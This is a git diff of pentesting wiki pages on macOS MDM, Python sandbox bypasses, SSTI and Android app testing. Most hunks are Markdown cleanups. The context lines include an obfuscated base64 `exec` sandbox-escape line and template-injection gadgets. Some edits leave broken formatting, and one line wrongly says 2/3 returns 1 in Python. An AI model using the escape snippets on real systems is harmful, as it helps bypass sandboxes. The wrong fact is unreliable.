+++ b/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md @@ -5,7 +5,7 @@ As [**previously commented**](./#what-is-mdm-mobile-device-management)**,** in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\ Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected. -**The following research is taken from** [**https://duo.com/labs/research/mdm-me-maybe**](https://duo.com/labs/research/mdm-me-maybe)**** +**The following research is taken from** [**https://duo.com/labs/research/mdm-me-maybe**](https://duo.com/labs/research/mdm-me-maybe) ## Reversing the process diff --git a/macos/macos-security-and-privilege-escalation/macos-protocols.md b/macos/macos-security-and-privilege-escalation/macos-protocols.md index 1be12bdb..a3c11279 100644 --- a/macos/macos-security-and-privilege-escalation/macos-protocols.md +++ b/macos/macos-security-and-privilege-escalation/macos-protocols.md 
@@ -12,7 +12,7 @@ Zero Configuration Networking, such as Bonjour provides: The device will get an **IP address in the range 169.254/16** and will check if any other device is using that IP address. If not, it will keep the IP address. Macs keeps an entry in their routing table for this subnet: `netstat -rn | grep 169` For DNS the **Multicast DNS (mDNS) protocol is used**. [**mDNS** **services** listen in port **5353/UDP**](../../pentesting/5353-udp-multicast-dns-mdns.md), use **regular DNS queries** and use the **multicast address 224.0.0.251** instead of sending the request just to an IP address. Any machine listening these request will respond, usually to a multicast address, so all the devices can update their tables.\ -Each device will **select its own name** when accessing the network, the device will choose a name **ended in .local** (might be based on the hostname or a completely random one). +Each device will **select its own name** when accessing the network, the device will choose a name **ended in .local** (might be based on the hostname or a completely random one). For **discovering services DNS Service Discovery (DNS-SD)** is used. @@ -77,5 +77,5 @@ sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.p ## References -* [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt\_other?\_encoding=UTF8\&me=\&qid=)**** -* ****[**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)**** +* [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt\_other?\_encoding=UTF8\&me=\&qid=) +* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html) diff --git a/macos/macos-security-and-privilege-escalation/macos-red-teaming.md b/macos/macos-security-and-privilege-escalation/macos-red-teaming.md index 8e3dd3f0..2830c6a0 100644 
--- a/macos/macos-security-and-privilege-escalation/macos-red-teaming.md +++ b/macos/macos-security-and-privilege-escalation/macos-red-teaming.md @@ -44,8 +44,8 @@ dscl "/Active Directory/[Domain]/All Domains" ls / Also there are some tools prepared for MacOS to automatically enumerate the AD and play with kerberos: * [**Machound**](https://github.com/XMCyber/MacHound): MacHound is an extension to the Bloodhound audting tool allowing collecting and ingesting of Active Directory relationships on MacOS hosts. -* ****[**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost is an Objective-C project designed to interact with the Heimdal krb5 APIs on macOS. The goal of the project is to enable better security testing around Kerberos on macOS devices using native APIs without requiring any other framework or packages on the target. -* ****[**Orchard**](https://github.com/its-a-feature/Orchard): JavaScript for Automation (JXA) tool to do Active Directory enumeration. +* [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost is an Objective-C project designed to interact with the Heimdal krb5 APIs on macOS. The goal of the project is to enable better security testing around Kerberos on macOS devices using native APIs without requiring any other framework or packages on the target. +* [**Orchard**](https://github.com/its-a-feature/Orchard): JavaScript for Automation (JXA) tool to do Active Directory enumeration. ### Domain Information diff --git a/misc/basic-python/README.md b/misc/basic-python/README.md index 74b6f7cf..3ee840e5 100644 --- a/misc/basic-python/README.md +++ b/misc/basic-python/README.md 
@@ -10,7 +10,7 @@ The difference between a Tuple and a List is that the position of a value in a t ### Main operations -To raise a number you should do: 3\*\*2 (it isn't 3^2)\ +To raise a number you should do: 3**2 (it isn't 3^2)\ If you do 2/3 it returns 1 because you are dividing two ints. If you want decimals you should divide floats (2.0/3.0).\ i >= j\ i <= j\ @@ -179,7 +179,7 @@ for f, b in zip(foo, bar): **Lambda** is used to define a function\ (lambda x,y: x+y)(5,3) = 8 --> Use lambda as simple **function**\ -**sorted**(range(-5,6), key=lambda x: x\*\* 2) = \[0, -1, 1, -2, 2, -3, 3, -4, 4, -5, 5] --> Use lambda to sort a list\ +**sorted**(range(-5,6), key=lambda x: x** 2) = \[0, -1, 1, -2, 2, -3, 3, -4, 4, -5, 5] --> Use lambda to sort a list\ m = **filter**(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) = \[3, 6, 9] --> Use lambda to filter\ **reduce** (lambda x,y: x\*y, \[1,2,3,4]) = 24 diff --git a/misc/basic-python/bypass-python-sandboxes/README.md b/misc/basic-python/bypass-python-sandboxes/README.md index 284acb11..5223dbeb 100644 --- a/misc/basic-python/bypass-python-sandboxes/README.md +++ b/misc/basic-python/bypass-python-sandboxes/README.md @@ -118,8 +118,8 @@ exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk=')) ## Builtins -* ****[**Builtins functions of python2**](https://docs.python.org/2/library/functions.html)**** -* ****[**Builtins functions of python3**](https://docs.python.org/3/library/functions.html)**** +* [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html) +* [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html) If you can access to the**`__builtins__`** object you can import libraries (notice that you could also use here other string representation showed in last section): 
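Review bot: in misc/basic-python/README.md the unescaped `3**2` and `key=lambda x: x** 2` now sit in plain prose, where `**` is an emphasis delimiter; `x** 2` directly after the bold `**sorted**` run is the kind of mixed delimiter run that Markdown engines resolve differently, and the original `\*\*` escaping was deliberate because these are Python power operators. Put the expressions in code spans instead, `` `3**2` `` and `` `sorted(range(-5,6), key=lambda x: x**2)` ``, which also removes the inconsistency with the `reduce` example two lines below, where `x\*y` is left escaped by this hunk. The untouched context line `If you do 2/3 it returns 1 because you are dividing two ints` is also wrong: integer division of 2 by 3 gives 0 under Python 2 (and 0.666... under Python 3), so it should say the result is 0 and only for Python 2.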
@@ -547,7 +547,7 @@ class HAL9000(object): #I'm afraid I can't do that. ``` -**More examples** about **format** **string** examples can be found in [**https://pyformat.info/**](https://pyformat.info)**** +**More examples** about **format** **string** examples can be found in [**https://pyformat.info/**](https://pyformat.info) ### Sensitive Information Disclosure Payloads @@ -565,7 +565,7 @@ class HAL9000(object): ## Dissecting Python Objects {% hint style="info" %} -If you want to **learn** about **python bytecode** in depth read these **awesome** post about the topic: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d)**** +If you want to **learn** about **python bytecode** in depth read these **awesome** post about the topic: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d) {% endhint %} In some CTFs you could be provided the name of a **custom function where the flag** resides and you need to see the **internals** of the **function** to extract it. @@ -605,7 +605,7 @@ get_flag.__globals__ CustomClassObject.__class__.__init__.__globals__ ``` -[**See here more places to obtain globals**](./#globals-and-locals)**** +[**See here more places to obtain globals**](./#globals-and-locals) ### **Accessing the function code** @@ -854,7 +854,7 @@ def check_permission(super_user): print(f"\nNot a Super User!!!\n") ``` -will be bypassed +will be bypassed ## References diff --git a/misc/basic-python/magic-methods.md b/misc/basic-python/magic-methods.md index 23d479b4..1e9a99c9 100644 --- a/misc/basic-python/magic-methods.md +++ b/misc/basic-python/magic-methods.md 
@@ -6,7 +6,7 @@ You can access the **methods** of a **class** using **\_\_dict\_\_.** ![](<../../.gitbook/assets/image (42).png>) -You can access the functions +You can access the functions ![](<../../.gitbook/assets/image (45).png>) @@ -30,7 +30,7 @@ You can access the **methods** of the **class** of an **object chainning** magic ## Server Side Template Injection -Interesting functions to exploit this vulnerability +Interesting functions to exploit this vulnerability ``` __init__.__globals__ diff --git a/mobile-apps-pentesting/android-app-pentesting/README.md b/mobile-apps-pentesting/android-app-pentesting/README.md index 09280d63..a64ac6e5 100644 --- a/mobile-apps-pentesting/android-app-pentesting/README.md +++ b/mobile-apps-pentesting/android-app-pentesting/README.md 
@@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} 
@@ -27,7 +27,7 @@ It's highly recommended to start reading this page to know about the **most impo This is the main tool you need to connect to an android device (emulated or physical).\ It allows you to control your device over **USB** or **Network** from a computer, **copy** files back and forth, **install** and uninstall apps, run **shell** commands, perform **backups**, read **logs** and more. -Take a look to the following list of [**ADB Commands**](adb-commands.md) \_\*\*\_to learn how to use adb. +Take a look to the following list of [**ADB Commands**](adb-commands.md) \_**\_to learn how to use adb. ## Smali @@ -305,13 +305,13 @@ Drozer is s useful tool to **exploit exported activities, exported services and ### Exploiting exported Activities -\*\*\*\*[**Read this if you want to remind what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities)\ -\_\*\*\_Also remember that the code of an activity starts with the `onCreate` method. +[**Read this if you want to remind what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities)\ +\_**\_Also remember that the code of an activity starts with the `onCreate` method. #### Authorisation bypass When an Activity is exported you can invoke its screen from an external app. Therefore, if an activity with **sensitive information** is **exported** you could **bypass** the **authentication** mechanisms **to access it.**\ -[**Learn how to exploit exported activities with Drozer.**](drozer-tutorial/#activities)\*\*\*\* +[**Learn how to exploit exported activities with Drozer.**](drozer-tutorial/#activities) You can also start an exported activity from adb: 
@@ -334,14 +334,14 @@ Note that an authorisation bypass is not always a vulnerability, it would depend ### Exploiting Content Providers - Accessing and manipulating sensitive information -\*\*\*\*[**Read this if you want to remind what is a Content Provider.**](android-applications-basics.md#content-provider)\ +[**Read this if you want to remind what is a Content Provider.**](android-applications-basics.md#content-provider)\ Content providers are basically used to **share data**. If an app has available content providers you may be able to **extract sensitive** data from them. It also interesting to test possible **SQL injections** and **Path Traversals** as they could be vulnerable.\ -[**Learn how to exploit Content Providers with Drozer.**](drozer-tutorial/#content-providers)\*\*\*\* +[**Learn how to exploit Content Providers with Drozer.**](drozer-tutorial/#content-providers) ### **Exploiting Services** [**Read this if you want to remind what is a Service.**](android-applications-basics.md#services)\ -\_\*\*\_Remember that a the actions of a Service start in the method `onStartCommand`. +\_**\_Remember that a the actions of a Service start in the method `onStartCommand`. As service is basically something that **can receive data**, **process** it and **returns** (or not) a response. Then, if an application is exporting some services you should **check** the **code** to understand what is it doing and **test** it **dynamically** for extracting confidential info, bypassing authentication measures...\ [**Learn how to exploit Services with Drozer.**](drozer-tutorial/#services) 
@@ -349,7 +349,7 @@ As service is basically something that **can receive data**, **process** it and ### **Exploiting Broadcast Receivers** [**Read this if you want to remind what is a Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)\ -\_\*\*\_Remember that a the actions of a Broadcast Receiver start in the method `onReceive`. +\_**\_Remember that a the actions of a Broadcast Receiver start in the method `onReceive`. A broadcast receiver will be waiting for a type of message. Depending on ho the receiver handles the message it could be vulnerable.\ [**Learn how to exploit Broadcast Receivers with Drozer.**](./#exploiting-broadcast-receivers) @@ -437,7 +437,7 @@ Dynamic instrumentation toolkit for developers, reverse-engineers, and security **Learn how to use Frida:** [**Frida tutorial**](frida-tutorial/)\ **Some "GUI" for actions with Frida:** [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)\ **Some other abstractions based on Frida:** [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon)\ -**You can find some Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)\*\*\*\* +**You can find some Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re) ### **Android Application Analyzer** 
@@ -457,7 +457,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b * **JavaScript Injection (XSS):** Verify that JavaScript and Plugin support is disabled for any WebViews (disabled by default). [More info here](webview-attacks.md#javascript-enabled). * **Local File Inclusion:** Verify that File System Access is disabled for any WebViews (enabled by default) `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled). * **Eternal cookies**: In several cases when the android application finish the session the cookie isn't revoked or it could be even saved to disk -* \*\*\*\*[**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags) +* [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags) ## Automatic Analysis 
@@ -496,7 +496,7 @@ By default, it will also use some Frida Scripts to **bypass SSL pinning**, **roo MobSF can also **invoke exported activities**, grab **screenshots** of them and **save** them for the report. To **start** the dynamic testing press the green bottom: "**Start Instrumentation**". Press the "**Frida Live Logs**" to see the logs generated by the Frida scripts and "**Live API Monitor**" to see all the invocation to hooked methods, arguments passed and returned values (this will appear after pressing "Start Instrumentation").\ -MobSF also allows you to load your own \*\*Frida scripts (\*\*to send the results of your Friday scripts to MobSF use the function `send()`). It also has **several pre-written scripts** you can load (you can add more in `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), just **select them**, press "**Load**" and press "**Start Instrumentation**" (you will be able to see the logs of that scripts inside "**Frida Live Logs**"). +MobSF also allows you to load your own **Frida scripts (**to send the results of your Friday scripts to MobSF use the function `send()`). It also has **several pre-written scripts** you can load (you can add more in `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), just **select them**, press "**Load**" and press "**Start Instrumentation**" (you will be able to see the logs of that scripts inside "**Frida Live Logs**"). ![](<../../.gitbook/assets/image (215).png>) @@ -686,7 +686,7 @@ APKiD gives you information about **how an APK was made**. It identifies many ** ### Manual -[Read this tutorial to learn some tricks on **how to reverse custom obfuscation**](manual-deobfuscation.md)\*\*\*\* +[Read this tutorial to learn some tricks on **how to reverse custom obfuscation**](manual-deobfuscation.md) ## Labs diff --git a/mobile-apps-pentesting/android-app-pentesting/adb-commands.md b/mobile-apps-pentesting/android-app-pentesting/adb-commands.md index 2965e61f..59f5990d 100644 
--- a/mobile-apps-pentesting/android-app-pentesting/adb-commands.md +++ b/mobile-apps-pentesting/android-app-pentesting/adb-commands.md @@ -10,7 +10,7 @@ C:\Users\\AppData\Local\Android\sdk\platform-tools\adb.exe /Users//Library/Android/sdk/platform-tools/adb ``` -**Information obtained from:** [**http://adbshell.com/**](http://adbshell.com)**** +**Information obtained from:** [**http://adbshell.com/**](http://adbshell.com) ## Connection diff --git a/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md index 17b5dc47..151ca212 100644 --- a/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md +++ b/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md @@ -92,7 +92,7 @@ This introduction is taken from [https://maddiestone.github.io/AndroidAppRE/app\ * assets/ * Any other files that may be needed by the app. * Additional native libraries or DEX files may be included here. This can happen especially when malware authors want to try and “hide” additional code, native or Dalvik, by not including it in the default locations. - * res/ + * res/ * the directory containing resources not compiled into resources.arsc ### **Dalvik & Smali** @@ -198,7 +198,7 @@ If you find functions containing the word "sticky" like **`sendStickyBroadcast`* ## Deep links / URL schemes -**Deep links allow to trigger an Intent via URL**. An application can declare an **URL schema** inside and activity so every time the Android device try to **access an address using that schema** the applications activity will be called: +**Deep links allow to trigger an Intent via URL**. An application can declare an **URL schema** inside and activity so every time the Android device try to **access an address using that schema** the applications activity will be called: ![](<../../.gitbook/assets/image (214).png>) 
@@ -210,7 +210,7 @@ If inside the `intent-filter`you find something like this: Then, it's expecting something like `http://www.example.com/gizmos` - If you find something like this: +If you find something like this: ![](<../../.gitbook/assets/image (262).png>) diff --git a/mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md b/mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md index 71320a74..9e86f1ed 100644 --- a/mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md +++ b/mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md @@ -1,6 +1,6 @@ # Burp Suite Configuration for Android -**This tutorial was taken from:** [**https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533**](https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533)**** +**This tutorial was taken from:** [**https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533**](https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533) ## Add a proxy in Burp Suite to listen. diff --git a/mobile-apps-pentesting/android-app-pentesting/android-task-hijacking.md b/mobile-apps-pentesting/android-app-pentesting/android-task-hijacking.md index 95747804..d6e9f495 100644 --- a/mobile-apps-pentesting/android-app-pentesting/android-task-hijacking.md +++ b/mobile-apps-pentesting/android-app-pentesting/android-task-hijacking.md 
@@ -65,7 +65,7 @@ When the launchMode is set to `singleTask`, the Android system evaluates three p The victim needs to have the **malicious** **app** **installed** in his device. Then, he needs to **open** **it** **before** opening the **vulnerable** **application**. Then, when the **vulnerable** application is **opened**, the **malicious** **application** will be **opened** **instead**. If this malicious application presents the **same** **login** as the vulnerable application the **user won't have any means to know that he is putting his credentials in a malicious application**. -**You can find an attack implemented here:** [**https://github.com/az0mb13/Task\_Hijacking\_Strandhogg**](https://github.com/az0mb13/Task\_Hijacking\_Strandhogg)**** +**You can find an attack implemented here:** [**https://github.com/az0mb13/Task\_Hijacking\_Strandhogg**](https://github.com/az0mb13/Task\_Hijacking\_Strandhogg) ## Preventing task hijacking @@ -73,5 +73,5 @@ Setting `taskAffinity=""` can be a quick fix for this issue. The launch mode can ## **References** -* ****[**https://blog.dixitaditya.com/android-task-hijacking/**](https://blog.dixitaditya.com/android-task-hijacking/)**** -* ****[**https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html**](https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html)**** +* [**https://blog.dixitaditya.com/android-task-hijacking/**](https://blog.dixitaditya.com/android-task-hijacking/) +* [**https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html**](https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html) diff --git a/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md b/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md index 284ef6b5..2a5b4f75 100644 --- a/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md +++ b/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md 
@@ -47,10 +47,10 @@ Another **interesting tool to make a Static analysis is**: [**bytecode-viewer**] If you modify the code, then you can **export it**.\ One bad thing of bytecode-viewer is that it **doesn't have references** or **cross-references.** -### ****[**Enjarify**](https://github.com/Storyyeller/enjarify)**** +### [**Enjarify**](https://github.com/Storyyeller/enjarify) Enjarify is a tool for translating Dalvik bytecode to equivalent Java bytecode. This allows Java analysis tools to analyze Android applications.\ -****Dex2jar is an older tool that also tries to translate Dalvik to Java bytecode. It works reasonably well most of the time, but a lot of obscure features or edge cases will cause it to fail or even silently produce incorrect results. By contrast, Enjarify is designed to work in as many cases as possible, even for code where Dex2jar would fail. Among other things, Enjarify correctly handles unicode class names, constants used as multiple types, implicit casts, exception handlers jumping into normal control flow, classes that reference too many constants, very long methods, exception handlers after a catchall handler, and static initial values of the wrong type. +Dex2jar is an older tool that also tries to translate Dalvik to Java bytecode. It works reasonably well most of the time, but a lot of obscure features or edge cases will cause it to fail or even silently produce incorrect results. By contrast, Enjarify is designed to work in as many cases as possible, even for code where Dex2jar would fail. Among other things, Enjarify correctly handles unicode class names, constants used as multiple types, implicit casts, exception handlers jumping into normal control flow, classes that reference too many constants, very long methods, exception handlers after a catchall handler, and static initial values of the wrong type. ### [CFR](https://github.com/leibnitz27/cfr) 
diff --git a/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md b/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md index e4e2cb98..cb390fee 100644 --- a/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md +++ b/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md @@ -28,12 +28,12 @@ If you installed Android Studio, you can just open the main project view and acc ![](<../../.gitbook/assets/image (330).png>) Then, click on _**Create Virtual Device**_, _**select** the phone you want to use_ and click on _**Next.**_\ -\_\*\*\*\*\_In the current view you are going to be able to **select and download the Android image** that the phone is going to run: +\_\_In the current view you are going to be able to **select and download the Android image** that the phone is going to run: ![](<../../.gitbook/assets/image (331).png>) -So, select it and click on _**Download**_\*\* (**now wait until the image is downloaded).**\ -**Once the image is downloaded, just select \_**Next**\_ and \_**Finish\*\*\_. +So, select it and click on _**Download**_** (**now wait until the image is downloaded).**\ +**Once the image is downloaded, just select \_**Next**\_ and \_**Finish**\_. ![](<../../.gitbook/assets/image (332).png>) @@ -105,7 +105,7 @@ id: 9 or "Nexus 5X" ``` Once you have decide the name of the device you want to use, you need to **decide which Android image you want to run in this device.**\ -\*\*\*\*You can list all the options using `sdkmanager`: +You can list all the options using `sdkmanager`: ```bash C:\Users\\AppData\Local\Android\Sdk\tools\bin\sdkmanager.bat --list diff --git a/mobile-apps-pentesting/android-app-pentesting/content-protocol.md b/mobile-apps-pentesting/android-app-pentesting/content-protocol.md index c8f3e47c..0520c63c 100644 --- a/mobile-apps-pentesting/android-app-pentesting/content-protocol.md 
+++ b/mobile-apps-pentesting/android-app-pentesting/content-protocol.md @@ -97,4 +97,4 @@ A proof-of-concept is pretty straightforward. An HTML document that uses `XMLHtt ``` -**Information taken from this writeup:** [**https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/**](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)**** +**Information taken from this writeup:** [**https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/**](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/) diff --git a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md index 51cce54d..983bc27c 100644 --- a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md +++ b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md @@ -57,7 +57,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords content://com.mwr.example.sieve.DBContentProvider/Passwords/ ``` -You should also check the **ContentProvider code** to search for queries: +You should also check the **ContentProvider code** to search for queries: ![](<../../../.gitbook/assets/image (121) (1) (1).png>) @@ -173,7 +173,7 @@ dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc ### **Path Traversal** -If you can access files, you can try to abuse a Path Traversal (in this case this isn't necessary but you can try to use "_../_" and similar tricks). +If you can access files, you can try to abuse a Path Traversal (in this case this isn't necessary but you can try to use "_../_" and similar tricks). ``` dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts 
diff --git a/mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md b/mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md index 8e1f6ac5..1a8fce04 100644 --- a/mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md +++ b/mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md @@ -1,6 +1,6 @@ # Exploiting a debuggeable applciation -**Information copied from** [**https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article**](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article)**** +**Information copied from** [**https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article**](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article) To make this article more interesting, I have developed a vulnerable application for demonstration purposes, which has a “**button**” and a “**textview**“. diff --git a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md index 2e843a8c..4e2047b7 100644 --- a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md +++ b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md 
@@ -46,7 +46,7 @@ Follow the[ link to read it.](frida-tutorial-2.md) **APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk) Follow the [link to read it](owaspuncrackable-1.md).\ -**You can find some Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)**** +**You can find some Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re) ## Fast Examples @@ -129,7 +129,7 @@ Hook android `.onCreate()` ### Hooking functions with parameters and retrieving the value - Hooking a decryption function. Print the input, call the original function decrypt the input and finally, print the plain data: +Hooking a decryption function. Print the input, call the original function decrypt the input and finally, print the plain data: ```javascript function getString(data){ diff --git a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md index 6c58fec8..0ef16d3f 100644 --- a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md +++ b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md 
@@ -28,13 +28,13 @@ Java.perform(function x() { //Hook "fun" with paramater(String) var string_class = Java.use("java.lang.String"); my_class.fun.overload("java.lang.String").implementation = function (x) { //hooking the new function - console.log("*************************************") + console.log("*") //Create a new String and call the function with your input. var my_string = string_class.$new("My TeSt String#####"); console.log("Original arg: " + x); var ret = this.fun(my_string); console.log("Return value: " + ret); - console.log("*************************************") + console.log("*") return ret; }; //Find an instance of the class and call "secret" function. diff --git a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md index c19c0695..d02166e4 100644 --- a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md +++ b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md @@ -3,9 +3,9 @@ **From**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\ **APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk) -## Solution 1 +## Solution 1 -Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) +Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) **Hook the **_**exit()**_ function and **decrypt function** so it print the flag in frida console when you press verify: 
@@ -48,7 +48,7 @@ Java.perform(function () { ## Solution 2 -Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) +Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) **Hook rootchecks** and decrypt function so it print the flag in frida console when you press verify: diff --git a/mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md b/mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md index 1ed185bf..692969ac 100644 --- a/mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md +++ b/mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md @@ -14,7 +14,7 @@ Reading the java code: ![](<../../.gitbook/assets/image (47).png>) -It looks like the function that is going print the flag is **m().** +It looks like the function that is going print the flag is **m().** ## **Smali changes** diff --git a/mobile-apps-pentesting/android-app-pentesting/inspeckage-tutorial.md b/mobile-apps-pentesting/android-app-pentesting/inspeckage-tutorial.md index 5f6ffe30..fd6d9378 100644 --- 